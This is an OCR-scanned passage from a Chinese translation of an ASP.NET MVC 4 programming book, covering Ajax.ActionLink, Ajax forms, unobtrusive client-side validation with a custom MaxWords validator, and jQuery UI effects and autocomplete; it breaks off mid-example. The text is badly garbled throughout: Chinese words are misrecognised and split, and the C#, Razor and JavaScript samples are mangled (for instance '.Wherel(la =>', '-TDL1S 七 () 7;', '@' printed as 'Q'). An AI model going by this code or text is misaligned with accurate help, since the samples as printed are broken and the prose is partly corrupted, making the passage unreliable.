图 8-2 
在 用 户 单 击 并 查看 折扣 专辑 后 ， 页 和 面 并 未 全 部 刷新 ， 显 示 效 果 如 图 8-3 所 示 。 


| 
he For [hos Lat There Be Balls to th Restless and 
Men AbBout TG Rock Reelk Wall WVild 
Ve Salute Tou 
Artist: Men At Work 
Price: 8.99 
Add to cart 

| 


图 8-3 


注意 ”如 果 想 查看 操作 中 的 代码 ,可 使 用 NuGet 安 浆 Wrox.ProMvVvc4.Ajax. 
Action Link 包 。 该 包 中 的 代码 依赖 于 MVC Music Store 中 的 数据 访问 类 ， 所 以 
最 好 尝试 MVC Music Store 项 目 中 的 包 。 一 旦 安 关 该 包 ， 就 可 以 导航 到 
/ActionLink 查看 新 的 首页 了 。 


Ajax.ActionLink 生成 的 内 容 能 够 获取 服务 器 的 啊 应 ， 并 可 以 直接 把 新 内 容 移植 到 页 面 
中 。 这 是 如 何 友 生 的 呢 ? 下 一 节 将 介绍 异步 操作 链接 的 工作 原理 。 


8.2.2 ”HTML 5 特性 
如 果 查 看 ActionLink 方法 泻 染 的 标记 ， 就 会 看 到 如 下 代码 


<a data-ajax="true" data-ajax-method="GET" data-ajax-mode="replace" 
data-ajax-update="#dailydeal™" href="/Home/DailyDeal™> 
Click here to See today&#39;s special! 

</a> 


非 侵入 式 JavaScript 的 显著 特点 是 在 HIML 中 不 包含 任何 JavaScript 代码 ， 也 就 是 说 ， 
在 HTML 中 看 不 到 脚本 代码 。 如 果 仔 细 看 ， 就 会 发 现在 ActionLink 中 指定 的 所 有 设置 被 编 
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但 成 了 HTML 元 素 的 特性 ， 并 且 大 多 数 的 编码 特性 都 有 data- 前 级 ， 通 常 称 为 data- 特 性 。 

HTML 5 规范 为 私有 应 用 程序 状态 保留 了 data- 特 性 。 换 名 话说 ，Web 浏览 器 不 会 尝试 
解释 data- 特 性 的 内 容 ， 因 此 可 放心 地 把 目 己 的 数据 交 给 它 ， 这 些 数据 不 会 影响 页 面 的 显示 
或 泻 染 。data- 特 性 在 HTML 5 规范 发 布 之 前 就 已 经 应 用 到 浏览 器 中 。 例 如 ， 正 6 会 忽略 它 
不 理解 的 任何 特性 ， 所 以 data- 特 性 在 以 前 的 正 版 本 中 是 安全 的 。 

回应 用 程序 中 添加 jqueryunobtrusive-ajax 文件 的 目的 是 查找 特定 的 data- 特 性 , 然后 操 
纵 元 素 使 其 表现 出 不 同行 为 。 如 果 知 道 使 用 jQuery 可 以 很 容易 地 奉 找 元 素 ， 那 么 在 非 侵 入 
式 JavaScript 文件 中 出 现 如 下 所 示 的 代码 也 就 不 是 为 奇 了 : 

$ (function () { 

$s ("a[ldata-ajax]=true"). // do something 
}); 

这 段 代 码 将 使 用 jQuery 查找 data-ajax 特性 值 为 true 的 所 有 锚 元 素 。 元 素 上 的 data-ajax 
特性 用 来 标识 该 元 素 需 要 实现 异步 行为 。 一 旦 非 侵 入 式 脚 本 识别 了 异步 元 素 ， 它 就 可 以 读 
取 该 元 素 的 其 他 设置 ( 像 替 换 模式 、 更 新 目标 以 及 HTTP 方法 )， 还 可 通过 使 用 jQuery 连接 
事件 和 发 送 请 求 来 修改 该 元 素 的 行为 。 

所 有 ASPNET MVC Ajax 特性 都 使 用 data- 特 性 。 默 认 情 况 下 ， 这 包括 下 一 个 主题 : 异 
步 表 单 。 


8.2.3 Ajax 表单 


想象 男 一 种 情形 ， 要 在 音乐 商店 的 首页 为 用 户 洪 加 一 个 僵 找 艺术 家 的 功能 。 因 为 甫 要 
用 户 输 入 ， 所 以 必须 在 页 面 上 放 一 个 form 标签 ， 但 这 不 是 一 个 普通 表单 ， 而 是 异步 表单 。 


Qusing (Ajax.BeginForm("ArtistSearch", "Home™", 
new AjaxOptions | 
InsertionMode=InsertionMode.Replace, 
HttpMethod="GET", 
OnFalilure="searchFailed"™, 
LoadingElementId="ajax-loader", 
UpdateTargetlId="searchresults", 

} )) 


<input type="text" name="q" /> 

<input type="submit" value="search™" /> 

<img id="ajax—-loader" 
src="Q@~/Content/Images/ajax—-loader.gif" 
style="display:none"/> 


} 

在 要 泻 染 的 表单 中 ， 当 用 户 单 击 提交 按钮 和 时， 浏览 器 就 会 同 控 制 器 HomeController 的 
ArtistSearch 操作 发 送 异 步 GET 请 求 。 注 意 上 和 面 的 代码 已 经 指定 了 了 LoadingElementId 作为 
其 中 的 一 个 选项 。 当 执行 异步 请 求 时 ， 客 户 端 框架 会 目 动 地 显示 这 个 元 素 。 通 弟 情 况 下 ， 
在 这 个 元 素 内 部 会 出 现 一 个 具有 动画 效果 的 微调 框 ， 来 告知 用 户 后 台 正 在 进行 一 些 处 理 。 
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此 外 ， 还 有 一 个 OnFailure 选项 。 这 些 选项 包括 许多 参数 ， 可 以 设置 这 些 参 数 以 捕获 来 目 
Ajax 请 求 的 各 种 客户 端 事件 ， 如 OnBegin、OnComplete、OnSuccess 和 OnFailure 等 。 可 以 
给 这 些 参数 赋予 一 个 JavaScript 函数 的 名 称 ， 当 事件 触发 时 ， 调 用 该 函数 。 上 面 的 代码 还 为 
OnFailure 事件 指定 了 一 个 名 为 searchFailed 的 函数 ， 因 此 ， 需 要 使 运行 时 能 够 访问 到 这 个 
函数 (可 能 是 通过 把 它 放 在 MusicSceripts.js 文件 中 ): 
function searchFailed() 1 


$s("#searchresults") .html ("Sorry, there was a problem with the search.");} 


} 


如 果 服 务 器 代码 返回 一 个 错 误 ， 就 意味 看 Ajax 辅助 方法 执行 失败 ， 此 时 , 我们 可 能 想 
捕获 OnFailure 事件 。 如 果 用 户 单 击 “search” 按 钮 而 页 面 没有 有 反应， 他们 可 能 就 会 感到 困 
惑 。 与 前 面 代码 所 做 的 一 样 ， 可 以 显示 一 个 错误 提示 消 上 且 ， 人 至 少 让 他 们 知道 我 们 已 经 尽 
a 

辅助 方法 BeginForm 的 输出 类 似 于 辅助 方法 ActionLink。 最 后 ， 当 用 户 单 击 提交 按钮 
提交 表单 时 ， 服 务 左 端 会 接收 到 一 个 Ajax 请 求 ， 并 可 能 以 任意 格式 的 内 容 作 出 啊 应 。 当 客 
己 站 收 到 来 目 服务 历 问 的 啊 应 时 ， 非 侵入 式 脚本 融会 将 相应 内 容 放 入 DOM 中 。 在 这 个 例 
子 中 ， 新 内 容 要 替换 的 是 一 个 id 值 为 searchresults 的 元 素 。 

对 于 这 个 例子 ， 控 制 器 操作 需要 查询 数据 库 并 泻 染 一 个 部 分 视图 。 此 外 ， 操 作 还 要 返 
回 纯 文本 ， 但 同时 叉 想 把 艺术 家 放 在 一 个 列表 中 ， 因 此 ， 它 要 泻 染 一 个 部 分 视图 。 

public ActionResult ArtistSearch (string 9q) 

{ 


var artists = GetArtists (gq); 


return PartialView (artists); 


} 


private List<Artist> GetArtists(string searchstring) 
{ 
return storeDB.Artists 
.Wherel(la => a.Name.Contains (searchstring)) 
-TDL1S 七 () 7; 
} 


泻 染 的 部 分 视图 利用 模型 构建 列表 。 该 部 分 视图 的 名 称 是 ArtistSearch.cshtml， 位 于 项 日 
的 Views/Home 文件 夹 下 。 


Almodel IEnumerable<MvcMusicSstore.Models.Artist»> 


<div lid="searchresults">»> 
<ul> 
Qforeach (var item in Model) 1{ 
<]i>f@item.Name</l1i> 


} 
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</ul> 
</div> 


为 在 自己 的 MVC Music Store 项 目 中 执行 搜索 代码 ， 可 以 使 用 NuGET 安 
舟 WrOX.ProMvc4.Ajax.AjaxForm 色 ， 安 准 完 毕 后 运行 程序 ,浏览 到 /AjaxForm 
以 查看 新 的 首页 。 


章 后 面部 分 还 会 回 到 这 个 搜索 表单 ， 并 为 它 添加 其 他 一 些 特性 。 现 在 ， 我 们 把 注意 
力 转 同 ASPNET MVC 框架 的 男 一 个 内 置 Ajax 特性 一 一 对 客户 端 验 证 的 文 持 。 


8.3 客户 痕 验 证 


对 于 数据 注解 特性 来 说 ，ASPNET MVC 框架 的 客户 端 验证 是 默认 开局 的 。 下 面 介绍 
Album 类 的 Title 和 Price 属性 : 
[Required (ErrorMessage = An Album Title is TedulTred 1) j 


[stringLength (160) |] 
public string Title { get; set; } 


[Required (ErrorMessage = "Price 1S TeGulITred ) 
[Range (0.01, 100.00, 
ErrorMessage = "Price must be between 0.01 and 100.00")] 


public decimal Price { get; set; } 

数据 注解 特性 使 得 这 两 个 属性 值 必须 输入 , 并 且 还 对 Title 属性 值 限定 了 长 度 , 对 Price 
属性 值 限定 了 范围 。ASPNET MVC 的 模型 绑 定 器 在 设置 这 些 属性 值 时 会 执行 服务 器 端 验 
证 。 这 些 内 置 的 特性 也 触发 客户 端 验证 。 客 户 端 验 证 依赖 于 jQuery 验证 插件 。 
8.3.1 jQuery 验证 

下 如 前 面 提 到 的 , jQuery 验证 插件 (queryvalidate) 默 认 情 况 下 在 MVC4 应 用 程序 项 目的 
Scripts 文件 夹 下 。 如 果 想 实现 要 客户 端 验 证 ,那么 需要 一 对 脚本 标签 。 如 果 查 看 StoreManager 
文件 夹 中 的 Edit 或 Create 视图 ， 就 会 看 到 下 面 的 代码 : 

<SCTript src="~/Scripts/jquery.validate.min.ijs") 


></script> 
<Sscript src="~/Scripts/jquery.validate.unobtrusive.min.Js") 


></script> 
web.config 文件 中 的 Ajax 设置 
默认 情况 下 ， 非 侵入 式 JavaScript 和 客户 端 验证 在 ASPNET MVC 应 用 程序 中 是 启用 的 。 
然而 ， 可 通过 web.config 文件 中 的 设置 改变 这 些 和 行为。 如果 打开 新 应 用 程序 根 目 录 下 的 
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web.config 文件 ， 就 会 看 到 下 面 的 appSettings 配置 节点 : 


<apPsSett1IngGS> 

<add key="ClientValidationEnabled”" value="true"/> 

<add key="UnobtrusiveJavaSscriptEnabled™" value="true"/> 
</appsSettings> 


如 果 想 在 整个 应 用 程序 中 禁用 这 两 个 特性 中 的 任 一 特性 ， 只 需 将 相应 特性 的 value 值 改 
为 false 即 可 。 另 外 ， 还 可 以 逐 视图 地 控制 这 些 设 置 。HIML 辅助 方法 EnableClientValidation 
和 EnableUnobtrusiveJavascript 在 一 个 具体 视图 中 重 写 了 这 些 配置 设置 。 

禁用 这 些 特性 的 主要 怕 因 是 维护 应 用 程序 目 定 义 脚 本 的 回 后 兼容 性 。 


第 一 个 script 标签 加 载 精 简 的 jQuery 验证 插件 。jQuery 验证 实现 了 挂 接 到 事件 需要 的 
所 有 近 辑 ( 像 提 交 和 焦点 事件 )， 此 外 ， 还 要 执行 客户 端 验证 规则 。 该 插件 提供 了 丰富 的 默 
认 验 证 规则 集 。 
第 二 个 script 标签 包括 用 于 jQuery 验证 的 Microsoft 非 侵 入 式 适 配器 。 这 段 脚 本 中 的 代 
码 用 来 获取 ASPNET MVC 框架 发 出 的 元 数据 ,并 将 这 些 元 数据 转换 成 jQuery 验证 能 够 理 
解 的 数据 (所 以 它 能 够 做 所 有 的 困难 工作 )。 那 么 ， 这 些 元 数据 从 何 而 来 ? 首先 ， 还 记得 前 
面 如 何 创建 专辑 编辑 视图 吗 ? 使 用 视图 中 的 EditorForModel， 也 就 是 Shared 文件 夹 中 的 
Album 编辑 器 模板 。 该 模板 中 有 如 下 代码 : 
<p> 
QHtml .LabelFor (model => model .Title) 
QHtml .TextBoxFor (model => model .Title) 
QHtml .ValidationMessageFor (model => model .Title) 
< > 
<p> 
QHtml .LabelFor (model => model .Price) 
QHtml .TextBoxFor (model => model .Price) 
QHtml .ValidationMessageFor (model => model .Price) 
</p> 


这 里 ， 辅 助 方法 TextBoxFor 是 关键 所 在 。 它 为 基于 元 数据 的 模型 构建 输入 元 素 。 当 
TextBoxFor 看 到 验证 元 数据 (比如 Price 和 Title 属性 上 的 Required 和 StringLength 注解 ) 时 ， 
它 会 将 这 些 元 数据 放 入 到 泻 染 的 HTML 中 。Title 属性 的 编辑 器 的 标记 如 下 所 示 : 

<input 

data—val="true" 

data—val-length="The field Title must be a string with a maximum length 
of 工 60 

data—val-length-—max="160" data~val~-required="An Album Title Is required" 

id="Title™” name="Title™" type="text™" value="Greatest Hits™ /> 


这 里 ， 再 次 与 data- 特 性 见面 了 了 。 上 述 代 码 中 是 jquery.validate.unobtrusive 脚本 负责 使 
用 这 个 元 数据 (以 data-val="true" 开 头 ) 香 找 元 素 , 并 结合 jQuery 验证 插件 来 执行 元 数据 内 的 
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验证 规则 。jQuery 验证 可 运行 每 个 击 键 和 焦点 事件 上 的 规则 ， 给 用 户 提供 关于 错误 值 的 及 
时 反馈 信息 。 当 出 现 错误 时 ， 验 证 插件 也 能 阻止 表单 提交 ， 这 就 意味 着 不 需要 在 服务 器 上 
处 理 注定 要 失败 的 请 求 。 

为 了 更 深入 地 理解 这 些 过 程 的 工作 原理 ， 下 一 节 继 续 介绍 上 自 定 义 客 户 端 验证 。 


8.3.2 目 定 义 验证 


在 第 6 章 中 我 们 编写 了 MaxWordsAttribute 验证 特性 来 验证 一 个 字符 串 中 的 单词 个 数 。 
实现 代码 如 下 : 
public class MaxWordsAttribute : ValidationAttribute 
public MaxWordsAttribute (int maxWords) 
:base ("Too many words in {0}") 
{ 


MaxWords = maxWords; 


} 
public int MaxWords 1{ get; set; } 
protected override ValidationResult IsValidl 


obJject value., 
ValidationContext wvalidationContext) 


{ 
if (value '= null)} 
{ 
Var wordCount = value.ToString() .Split("” “})} .Length; 
if (wordCount > MaxWords) 
! 
return new ValidatijonResulti( 
FormatErrorMessage (validationContext .DisplayName) 
); 
} 
} 
return ValidationResult.Success; 
} 


} 
这 里 可 以 这 样 使 用 这 个 特性 , 如 下 面 代码 所 示 , 但 是 这 个 特性 只 支持 服务 器 端的 验证 : 


[Required (ErrorMessage = "An Album Title is required")l]| 
[StringLength (1L60) | 

[MaxWords (10) ] 

Public string Title { gets Setsy | 


为 了 文 持 客户 端 验证 ， 需 要 让 特性 实现 下 面 即将 介绍 的 接口 。 
1. ICllentValidatable 


IClientValidatable 接口 定义 了 单个 方法 : GetClientValidationRules。 当 ASPNET MVC 框架 
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使 用 这 个 接口 查找 验证 对 象 时 ， 它 会 调用 GetClientValidationRules 方法 来 检索 ModelClient- 
ValidationRule 对 象 序列 。 这 些 对 象 携带 有 框架 发 送 给 客户 端的 元 数据 和 规则 。 

可 使 用 下 面 的 代码 为 自 定 义 验证 器 实现 该 接口 : 

public class MaxWordsAttribute : ValidationAttribute, 


IClientValidatable 
{ 


public IEnumerable<ModelClientValidationRule> GetClientValidationRules! 
ModelMetadata metadata, ControllerContext context) 


L 
Var rule = new ModelClientValidationRule();} 
rule.ErrorMessage = FormatErrorMessage (metadata.GetDisplavyName () ); 
rule.VvalidationParameters.Add ("wordcount™", WordCount);} 
rule.VvalidationType = "maxwords"} 
Vield return rule; 

} 


} 

要 实现 在 客户 端 执行 验证 ， 需 要 提供 如 下 几 点 信息 : 

e 如 果 验 证 失败 ， 要 显示 的 提示 消 居 。 

e 人 允许 的 单词 数 的 范围 。 

e 一 段 用 来 计算 单词 数量 的 JavaScript 代码 标识 。 

这 些 信息 就 是 代码 放 进 返回 规则 中 的 内 容 。 请 注意 ， 如 果 和 需要 在 客户 端 触 发 多 种 类 型 
的 验证 ， 代 码 可 以 返回 多 个 规则 。 

其 中 ， 代 码 把 错误 提示 消息 放 入 规则 的 ErrorMessage 属性 中 。 这 样 做 可 使 服务 器 端 错 
误 提 示 消 息 精 确 地 匹配 客户 端 错误 提示 消息 。ValidationParameters 集合 用 来 存放 客户 端 需 
要 的 参数 ， 像 允许 的 最 大 单词 数 。 如 有 必要 ， 还 可 继续 同 该 集合 中 放 其 他 参数 ， 但 要 注意 
参数 的 名 称 是 有 意义 的 ， 它 们 需要 匹配 在 客户 端 脚本 中 看 到 的 名 称 。 最 后 ，ValidationType 
属性 标识 了 客户 端 需 要 的 一 段 JavaScript 代 但 。 

ASPNET MVC 框架 在 客户 端 上 利用 GetClientValidationRules 方法 返回 的 规则 将 信息 
序列 化 为 data- 特 性 : 


<input 

data—val="true" 

data—val-length="The field Title must be a string with a maximum length 
of 160." 

data—val-length-max="160" 

data-val-maxwords="Too many words in Title" 

data-val-maxwords-wordcount="10" 

data—val—required="An Album Title js required™" id="Title™” name="Title" 

type="text™" value="For Those About To Rock We Salute You"” /> 


注意 ，maxwords 是 如 何 出 现在 与 MaxWords 特性 相关 的 特性 名 称 中 的 呢 ?maxwords 文 
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本 之 所 以 会 出 现在 相关 特性 的 名 称 中 ， 是 因为 代码 将 规则 的 ValidationType 属性 设置 成 
maxwords( 是 的 , 验证 类 型 和 所 有 的 验证 参数 名 称 必 须 都 是 小 写 , 因为 它们 的 值 必须 能 够 作 
为 合法 的 HTML 特性 标识 符 使 用 )。 

尽管 现在 客户 端 上 有 元 数据 ， 但 仍 需 编写 一 些 执 行 验证 逻辑 的 脚本 代码 。 


2. 自 定义 验证 脚本 代码 


值得 庆幸 的 是 ， 在 客户 病 上 没 必要 编写 代码 来 从 data- 特 性 中 挖掘 元 数据 值 。 然 而 ， 为 
了 执行 验证 工作 ， 需 要 以 下 两 段 脚本 代码 : 

。 适配器 : 适配器 和 非 侵入 式 MVC 扩展 一 道 识别 需要 的 元 数据 。 然 后 非 侵 入 式 扩展 

帮助 从 data- 特 性 中 检索 值 , 并 且 还 帮助 把 数据 转换 为 jQuery 验证 能 够 理解 的 格式 。 

e 验证 规则 : 在 jQuery 用 语 中 被 称 作 验 证 堪 。 

这 两 段 代 码 都 在 同一 个 脚本 文件 中 。 假 设 某 一 时 刻 想 把 这 两 段 代码 放 在 MusicScripts js 文 
件 中 ， 该 文件 是 在 本 章 8.1.3 节 中 创建 的 。 这 种 情况 下 ， 要 确保 文件 MusicScriptsjs 出 现在 验 
证 脚本 之 后 。 这 可 以 借助 于 前 面 创建 的 脚本 节点 (scripts section)， 使 用 下 面 的 代码 来 实现 : 

Qsection scripts 

{ 

<script src="~/Scripts/jJquery.validate.min.]js" 
></script> 

<SCript src="~/Scripts/jquery.validate.unobtrusive.min.]j]s" 
></script> 

<Script src="~/Scripts/Musicscripts.js"> 


</script> 


} 
MusicScriptjs 可 以 为 我 们 提供 需要 的 所 有 智能 感知 功能 ， 或 者 ， 把 这 两 个 引用 添加 到 
_Teferences.js 文件 ， 也 可 以 实现 。 


1 /<Treference path="jJquery.validate.js" /> 
/// <reference path="jquery.validate.unobtrusive.]j]s" /> 


站 先 要 编写 的 代 人 码 是 适 配 颖 。MVC 框架 的 非 侵 入 式 验 证 扩展 存储 了 jQuery.validator. 
unobtrusive.adapters 对 象 中 的 所 有 适配器 。 这 些 适 配 回 对 象 公 开 了 一 个 API,， 我 们 可 以 用 来 
添加 新 的 适配器 ， 如 表 8-2 所 示 。 


表 8-2 ”适配器 方法 


名 称 描 述 
addBool 为 “启用 ”或 “禁止 ”的 验证 规则 创建 适配器 。 该 规则 不 需要 额外 参数 


addSingleVal | 为 需要 从 元 数据 中 检索 唯一 参数 值 的 验证 规则 创建 适配器 

addMinMax | 创建 一 个 映射 到 验证 规则 集 的 适配器 一 一 一 个 用 来 检查 最 小 值 , 为 一 个 用 来 检查 最 大 
值 。 这 两 个 规则 中 至 少 有 一 个 要 依靠 得 到 的 数据 运行 

Add 创建 一 个 不 适合 前 面 尖 别 的 适配器 ， 因 为 它 需 要 额外 参数 或 额外 的 设置 代码 
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对 于 最 大 单词 数 的 情形 ， 可 使 用 addSingleVal 或 addMinMax( 或 add， 因 为 它 适 用 于 任 
何 场合 )。 由 于 不 需要 检查 单词 的 最 小 数量 ， 因 此 可 使 用 API 函数 addSingleVal， 代 人 码 如 下 
所 不: 


/// <reference path="jquery.validate.js" /> 
/i// <reference path="jJquery.validate.unobtrusive.]s" /> 


$.validator.unobtrusive.adapters .addsingleVal ("maxwords", "wordcount"). 


第 一 个 参数 是 适 配 回 名 称 ， 它 必须 与 服务 器 端 设 置 的 ValidationProperty 值 匹配 。 第 二 
个 参数 是 要 从 元 数据 中 检索 的 参数 的 名 称 。 注 意 该 参数 名 称 上 未 使 用 data- 前 级 ; 在 服务 右 
上 它 匹 配 放 入 ValidationParameters 集合 的 参数 名 称 。 
适 配 右 相对 而 言 比较 简单 。 同 样 ， 适 配器 的 主要 目标 是 识别 非 侵 入 式 扩 展 要 定位 的 元 
数据 。 有 了 适 配 颖 ， 现 在 就 可 以 编写 验证 右 。 
所 有 验证 器 都 在 jQuery.validator 对 象 中 。 与 adapters 对 象 类 似 ，validator 对 象 也 有 一 
个 API 函数 ， 可 用 来 添加 新 验证 器 。 该 函数 的 名 称 是 addMethod: 
$.validator.addMethod ("maxwords", function (value, element, maxwords) { 
1 (value) 1 
if (value.split(" ) .Length > maxwords) |{ 
return false; 
} 
} 
return true; 
}); 
该 方法 中 有 两 个 参数 : 
e 验证 器 名 称 : 默认 情况 下 ， 验 证 右 名 称 要 逻 配 适 配 痴 名称 ， 而 适 配 右 名称 义 要 匹配 
服务 器 上 ValidationType 属性 的 值 。 
e 函数 : 当 验 证 发 生 时 调用 。 
验证 函数 接收 三 个 参数 ， 并 在 验证 成 功 时 返回 tue， 验 证 失败 时 返回 false: 
e 国 数 的 第 一 个 参数 包含 输入 值 ， 如 专辑 的 名 称 。 
e 第 二 个 参数 是 输入 元 素 , 其 中 包含 了 要 验证 的 值 (在 value 本 和 号 没有 提供 足够 信息 的 


情况 下 使 用 )。 
e 第 三 个 参数 包含 一 个 数组 中 的 所 有 验证 参数 ， 在 这 个 示例 中 包含 了 单一 验证 参数 
(也 即 最 大 的 单词 数量 )。 


为 将 验证 代码 引入 到 自己 的 项 目 中 ， 可 使 用 NuGet 安装 Wrox.ProMvce4. 
Ajax.CustomClientValidation 包 。 该 包 可 在 Samples\ClientValidation 文件 夹 中 添 
加 自 定 义 脚 本 和 自 定 义 属 性 。 
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虽然 ASPNET MVC Ajax 辅助 方法 提供 了 很 多 功能 , 但 有 一 个 jQuery 扩展 的 完整 生态 
系统 。 下 一 节 探 讨 选 择 组 。 


8.4 辅助 方法 之 外 


如果 在 浏览 器 中 访问 站 点 http:/plugin.jquerycom， 我 们 就 会 发 现 上 面 提 供 有 数 生 个 
jQuery 扩展 。 其 中 一 些 扩展 是 图 形 化 导 同 的 ， 可 以 使 内 容 以 动画 的 方式 显示 ; 其 他 一 些 扩 
展 是 像 日 期 选择 器 和 网 格 一 样 的 部 件 。 

使 用 jQuery 插件 通 名 涉及 下 载 插件 、 解 压缩 插件 ， 然 后 将 插件 添加 到 项 目 中 的 操作 。 
对 于 一 些 以 NuGet 包 的 形式 获得 的 jQuery 插件 ， 可 以 轻松 地 添加 到 项 目 中 。 许 多 插件 ， 尤 
其 是 面向 UI 的 插件 ， 除 包含 至 少 一 个 JavaScript 文件 外 ， 可 能 还 包含 将 要 使 用 的 图 像 和 样 

每 一 个 新 的 ASPNET MVC 项 目 都 默认 带 有 两 个 插件 :jQuery Validation( 前 面 已 经 用 过 ) 
和 jQuery UI( 马 上 就 要 看 到 )。 


8.4.1 jQuery UI 


jQuery UI 是 一 个 包含 效果 和 小 部 件 的 jQuery 插件 。 与 所 有 插件 类 似 ， 它 紧密 地 集成 
了 jQuery， 并 且 扩 展 J 了 jQuery 中 的 API。 作 为 一 个 例子 ， 下 面 回 到 本 章 前 面 的 第 一 段 代 
码 一 一 商店 首页 使 专辑 具有 动画 效果 的 代码: 


s (function () { 
$s ("#album-list img") .mouseover(function () { 
$ (this) .animate ({ height: "+=25", width: "+=25” }) 
-animate({ height: "=25", width: "=25" }); 
})}; 
}); 


现在 是 使 用 jQuery UI 实现 专辑 的 跳动 显示 ， 而 不 是 见长 的 动画 显示 。 第 一 步 是 同 布 
局 视图 中 添加 一 个 新 的 脚本 标签 ， 使 整个 应 用 程序 包括 jQuery UI: 


<ScCript src="~/Scripts/jquery-1.6.2.min.]s" 
></script> 

<Sscript src="~/Scripts/jquery.unobtrusive-ajax.min.]s" 
></script> 

<script src~/Scripts/jquery-ui.min.js" 
></script> 


下 一 步 修 改 mouseover 事件 处 理 程序 中 的 代码 : 


s{({function () f{ 
$s ("#album-list img") .mouseover (function () { 
$s (this) .effect ("bounce™); 
} ) 7 
}); 
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此 时 ， 当 用 尸 忌 标 移 过 专辑 图 像 时 ， 专 辑 图 像 就 会 出 现 短 时 间 的 上 下 跳动 效 末 。 正 如 
看 到 的 ，UI 插件 通过 提供 (执行 封装 集 的 ) 额 外 方法 来 扩展 jQuery。 大 部 分 的 这 些 方法 利用 
第 二 个 “选项 ”参数 来 调整 方法 行为 。 


$s (this) .effect ("bounce", { time: 3, distance: 40 }); 


通过 阅读 jQuery.com 站 点 上 的 插件 文档 , 我 们 可 以 找到 插件 都 有 哪些 选项 以 及 这 些 选 
项 的 默认 值 。jQuery UI 还 包含 有 其 他 的 效 末 : 爆炸 、 逐 渐 消 失 、 抒 动 和 有 规律 地 跳动 等 。 


“选项 参数 
“options” 参 数 在 整个 jQuery 和 jQuery 插件 中 普遍 存在 。 不 使 用 具有 6、7 个 不 同 参 
数 ( 像 时 间 、 距 离 、 方 向 、 模 式 等 ) 的 方法 ， 而 是 传递 一 个 对 象 ， 其 中 包含 为 要 设置 的 参数 
定义 的 属性 。 在 前 面 的 例子 中 ， 只 想 设置 时 间 和 距离 。 
文档 总 是 (几乎 总 是 ) 说 明了 可 用 的 参数 ， 以 及 每 个 参数 的 默认 值 。 我 们 只 需 构建 一 个 
对 象 ， 其 中 包含 为 想 要 修改 的 参数 定义 的 属性 。 


jQuery UI 不 仅仅 包括 美好 的 视觉 效果 ， 它 也 包括 小 部 件 ， 像 手风琴 式 的 下 拉 菜 单 、 自 
动 完 成 、 按 钮 、 日 期 选择 器 、 对 话 框 、 进 度 条 、 滑 块 和 选项 卡 等 。 下 一 节 探 讨 自动 完成 
部 件 。 

8.4.2 ”使 用 jQuery Ul 实现 自动 完成 部 件 


自动 完成 部 件 需 要 把 新 的 用 户 界 面 元 素 放 在 屏幕 上 的 合适 位 置 。 这 些 元 素 需 要 颜色 、 
字体 大 小 、 背 景 以 及 其 他 用 户 界 面 元 素 所 需要 的 典型 外 观 项 。jQuery UI 依赖 于 主题 来 提供 
外 观 细节 。jQuery UI 主题 包括 一 个 样式 表 和 一 些 图 像 。 每 个 新 MVC 项 目 都 是 从 Content 
目录 下 的 “基本 ”主题 开始 的 。 这 个 主题 包含 一 个 样式 表 (jquery-ui.css) 和 一 个 包含 若干 
个 .png 文件 的 images 文件 夹 。 

在 使 用 自动 完成 部 件 前 ， 可 通过 添加 基本 主题 样式 表 到 布局 视图 来 设置 应 用 程序 ， 使 
其 包 插 基本 样式 表 : 


<1link href="~/Content/site.css) rel="stylesheet™" 
type="text/css" /> 
<link href="~/Content/themes/base/JjJquery-ui.css" 
rel="stylesheet" 
type="text/css" /> 
<SCrlipt src="~/Scripts/jquery-1.4.4.min.]js" 
></script> 
<script src="~/Scripts/jquery.unobtrusive-ajax.min.Jjs" 
></script> 
<script src~/Scripts/jquery-ui.min.j]s" 
></script> 


如 果 在 一 开始 使 用 jQuery 时 ， 发 现 不 喜欢 基本 主题 ， 那 么 可 以 到 站 点 http://jqueryui. 
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comythemeroller 上 下 载 一 些 预 置 主 题 。 当 然 也 可 以 创建 目 己 的 主题 (使 用 实时 预览 )， 下 载 
-个 定制 的 jquery-ui.css 文件 。 


1. 添加 行为 


现在 还 记得 本 章 前 面 第 8.2.3 市 实现 的 艺术 家 搜索 功能 吗 ? 现在 我 们 在 它 的 基础 上 实现 : 
当 用 户 开 始 在 搜索 输入 框 中 输入 数据 时 ， 输 入 框 显示 一 个 该 用 户 可 能 要 输入 的 艺术 家 的 列 
表 。 为 此 ， 首 先 需要 从 JavaScript 中 找到 输入 元 素 , 然后 在 其 上 附加 jQuery 自动 完成 行为 。 
一 种 方法 是 借助 于 MVC 框架 的 思想 ， 使 用 data- 特 性 : 

<input type="text" name="qg" 
data-autocomplete-source="@Ur]1 .Action("QuickSsSearch", "Home™")™ /> 

按照 这 个 思路 ， 使 用 jQuery 查找 市 有 data-autocomplete-source 特性 的 元 素 。 这 样 就 可 
以 知道 哪些 输入 元 素 需 要 实现 目 动 完成 行为 。 目 动 完 成 部 件 需要 一 个 数据 源 ， 该 数据 源 可 
用 来 从 中 检索 候选 集 ， 以 便 实现 目 动 完成 功能 。 目 动 完成 功能 使 用 内 存 中 的 数据 源 与 它 使 
用 URL 指定 的 远程 数据 源 一 样 容易 。 由 于 艺术 家 的 数量 可 能 会 很 大 ,而 不 能 把 整个 列表 都 
发 送 到 客户 疾 ， 因 此 需要 采用 URL 方法 。 我 们 可 以 把 目 动 完成 部 件 可 能 调用 到 的 URL 赃 
入 到 data- 特 性 中 。 

在 MusicScriptsjs 文件 中 , 可 在 ready 事件 中 使 用 下 和 面 的 代码 , 来 将 目 动 完成 功能 附加 
到 带 有 data-autocomplete-source 特性 的 所 有 输入 元 素 上 : 

$s ("input[data-autocomplete-source]") .each (function () 1{ 

Var target = $(this); 
target.autocomplete({ source: 
target.attr("data-autocomplete—source™) 1})}; 

}); 

jQuery 的 each 函数 将 遍历 封装 集 ， 并 为 封装 集中 的 每 一 个 项 调用 一 次 它 的 参数 函数 。 
在 参数 函数 内 部 ， 调 用 目标 元 素 的 autocomplete 插件 方法 。autocomplete 方法 的 参数 是 一 
个 选项 参数 ， 但 与 大 多 数 选 项 参数 不 同 的 是 ， 它 有 一 个 属性 是 必需 的 一 一 source 属性 。 除 
此 之 外 ， 我 们 还 可 以 设置 其 他 的 选项 ， 比 如 在 按键 之 后 ， 目 动 完 成 跳 转 到 其 他 操作 以 前 的 
延迟 ， 以 及 在 目 动 完成 开始 发 送 请 求 到 数据 源 之 前 需要 的 最 小 字符 数量 。 

在 这 个 例子 中 ,我 们 将 数据 源 指向 了 一 个 控制 硕 操 作 ， 如 下 代码 所 示 ( 前 面 提 人 到 过 ， 这 
里 用 来 加 深 印 象 ): 


<input type="text" name="qg" 


